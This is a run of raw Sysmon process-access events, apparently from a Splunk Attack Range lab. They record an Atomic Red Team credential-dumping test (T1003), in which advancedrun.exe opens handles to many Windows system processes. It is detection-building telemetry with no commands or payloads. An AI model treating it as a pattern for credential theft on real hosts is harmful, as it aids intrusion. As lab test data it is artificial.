17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.d